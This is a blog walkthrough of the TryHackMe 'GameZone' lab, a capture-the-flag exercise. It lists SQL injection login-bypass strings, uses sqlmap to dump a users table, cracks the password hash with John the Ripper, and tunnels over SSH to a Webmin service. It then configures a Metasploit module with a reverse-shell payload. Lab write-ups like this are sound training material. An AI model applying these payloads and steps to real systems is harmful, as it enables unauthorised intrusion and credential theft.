BLOG
GameZone[Tryhackme]
Jul 4, 2021 |
10 minutes read
Categories: walkthrough
Tags: tryhackme, thm, sqli, injection, john-the-ripper, Linux-Machine, Tunneling, CVE-2012-2982
GameZone Walkthrough
Scanning
Port Scan
$ nmap -p0-65535 10.10.191.94 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 17:07 IST
Initiating Ping Scan at 17:07
Scanning 10.10.191.94 [2 ports]
Completed Ping Scan at 17:07, 0.38s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:07
Completed Parallel DNS resolution of 1 host. at 17:07, 2.22s elapsed
DNS resolution of 1 IPs took 2.22s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:07
Scanning 10.10.191.94 [2 ports]
Discovered open port 22/tcp on 10.10.191.94
Discovered open port 80/tcp on 10.10.191.94
Completed Connect Scan at 17:07, 0.37s elapsed (2 total ports)
Nmap scan report for 10.10.191.94
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-02 17:07:46 IST for 3s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.87 seconds
Service Scan
$ nmap -sV -sC -p22,80 10.10.191.94
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-02 17:10 IST
Nmap scan report for 10.10.191.94
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.07 seconds
Enumeration
22/tcp OpenSSH 7.2p2
Username Enumeration - CVE-2016-6210
Username Enumeration is possible. We can brute force the target for Usernames.
80/tcp Apache 2.4.18
Local Privilege Escalation - CVE-2019-0211
PrivEsc is possible using Apache 2.4.18
What is the name of the large cartoon avatar holding a sniper on the forum?
Input Forms
As we try to do SQL Injection attack using burp on one of the input froms, Login form is vulnerable to injection attacks
Once we perfrom the injection attack using one of the parameters in login form, we are greeted with portal page
' or 1=1 -- -
hi' or 'x'='x';
x' or 1=1 or 'x'='y
' or 0=0 #
' or 1=1 or "=
By intercepting the request and copying the data to request.txt
POST /portal.php HTTP/1.1
Host: 10.10.191.94
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.191.94/portal.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://10.10.191.94
Connection: close
Cookie: PHPSESSID=tembi8lf52qavglncpn8eriqq6
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
searchitem=dd
We can feed this to sqlmap for dumping database and hashes
$ sqlmap -r request.txt --dbms=mysql --dump
___
__H__
___ ___[.]_____ ___ ___ {1.5.6#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:54:10 /2021-07-02/
[18:54:10] [INFO] parsing HTTP request from 'req.txt'
[18:54:11] [INFO] testing connection to the target URL
[18:54:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:54:12] [INFO] testing if the target URL content is stable
[18:54:13] [INFO] target URL content is stable
[18:54:13] [INFO] testing if POST parameter 'searchitem' is dynamic
[18:54:13] [WARNING] POST parameter 'searchitem' does not appear to be dynamic
[18:54:13] [INFO] heuristic (basic) test shows that POST parameter 'searchitem' might be injectable (possible DBMS: 'MySQL')
[18:54:14] [INFO] heuristic (XSS) test shows that POST parameter 'searchitem' might be vulnerable to cross-site scripting (XSS) attacks
[18:54:14] [INFO] testing for SQL injection on POST parameter 'searchitem'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:54:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:54:36] [WARNING] reflective value(s) found and filtering out
[18:54:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:54:43] [INFO] testing 'Generic inline queries'
[18:54:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:55:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[...snip...]
[19:05:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[19:05:18] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:05:18] [INFO] fetching current database
[19:05:18] [INFO] fetching tables for database: 'db'
[19:05:19] [INFO] fetching columns for table 'users' in database 'db'
[19:05:19] [INFO] fetching entries for table 'users' in database 'db'
[19:05:20] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:05:26] [INFO] writing hashes to a temporary file '/tmp/sqlmapv5hxb31e6168/sqlmaphashes-dz3pht73.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
[19:05:32] [INFO] table 'db.users' dumped to CSV file '/home/user/.local/share/sqlmap/output/10.10.191.94/dump/db/users.csv'
[19:05:32] [INFO] fetching columns for table 'post' in database 'db'
[19:05:32] [INFO] fetching entries for table 'post' in database 'db'
Database: db
Table: post
[5 entries]
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | name | description |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Mortal Kombat 11 | Its a rare fighting game that hits just about every note as strongly as Mortal Kombat 11 does. Everything from its methodical and deep combat. |
| 2 | Marvel Ultimate Alliance 3 | Switch owners will find plenty of content to chew through, particularly with friends, and while it may be the gaming equivalent to a Hulk Smash, that isnt to say that it isnt a rollicking good time. |
| 3 | SWBF2 2005 | Best game ever |
| 4 | Hitman 2 | Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing. |
| 5 | Call of Duty: Modern Warfare 2 | When you look at the total package, Call of Duty: Modern Warfare 2 is hands-down one of the best first-person shooters out there, and a truly amazing offering across any system. |
+----+--------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[19:05:32] [INFO] table 'db.post' dumped to CSV file '/home/user/.local/share/sqlmap/output/10.10.191.94/dump/db/post.csv'
[19:05:32] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/10.10.191.94'
[*] ending @ 19:05:32 /2021-07-02/
From Sqlmap output. We obtained username and password hash
Username: agent47
Pass-Hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Exploitation
From the enumeration phase, we obtained username and password hash.
let’s crack the hash for password
hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
First Let’s find the type of hash, We found the hash is of sha256 algorithm
$ hash-identifier ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] SHA-256
[+] Haval-256
Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
HASH:
Using JohntheRipper and Seclists to crack the password
$ john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2021-07-02 20:12) 3.448g/s 9969Kp/s 9969Kc/s 9969KC/s vidhus..vidamexicana
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
Password is videogamer124.
In Scanning phase, we found ssh and http are open. Lets use the credentials on ssh and try to login to target.
$ ssh [email protected]
The authenticity of host '10.10.191.94 (10.10.191.94)' can't be established.
ECDSA key fingerprint is SHA256:mpNHvzp9GPoOcwmWV/TMXiGwcqLIsVXDp5DvW26MFi8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.191.94' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
agent47@gamezone:~$
Getting user flag
PrivEsc
On checking for vulnerable binaries,permissions,files etc. There are no fruitful results
We got the services listening on different ports. Most of them are used by us to get till here
There is a new port 10000, which is not yet known to us. By resolving its name there is a webmin service running on it.
Webmin is used for modifying system configuration files in *nix.
agent47@gamezone:~$ ss -tlpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 128 *:10000 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 :::80 :::*
LISTEN 0 128 :::22 :::*
agent47@gamezone:~$ ss -tlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:mysql *:*
LISTEN 0 128 *:webmin *:*
LISTEN 0 128 *:ssh *:*
LISTEN 0 128 :::http :::*
LISTEN 0 128 :::ssh :::*
agent47@gamezone:~$
Lets try to check the firewall rules to get the details on how this port is configured
agent47@gamezone:~$ iptables -L
iptables v1.6.0: can't initialize iptables table `filter': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
No juicy results
lets create the ssh tunnel port forwarding to get the access on port 10000.
$ ssh -L 58553:localhost:10000 [email protected]
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
agent47@gamezone:~$
Now try to access the webmin portal on port 58553(which is tunneled to port 10000).
we are greeted with webmin login form
By using the credentials, we obtained in enumeration phase, Let’s try to login.
Webmin is running with version 1.580
with the help of searchsploit, we got to know this version(1.580) is vulnerable to RCE
And its a metasploit module.
Lets fireup metasploit and try to gain the access
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
3 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
4 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
5 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options
Module options (exploit/unix/webapp/webmin_show_cgi_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true yes Use SSL
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin 1.580
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer124
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RPORT 58553
RPORT => 58553
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RPORT 58553
RPORT => 58553
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) >
Running the exploit and getting the root flag
